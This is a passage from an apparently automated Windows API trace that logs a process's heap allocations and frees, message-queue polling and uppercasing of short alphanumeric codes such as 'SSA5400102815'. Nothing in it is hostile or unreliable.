RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.764] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.764] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.765] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.765] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.765] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.765] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.766] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.766] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.766] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.768] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.768] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.768] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.768] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.769] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.769] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.769] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.770] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.770] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0256.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.771] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.772] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.772] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0256.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0256.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.773] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 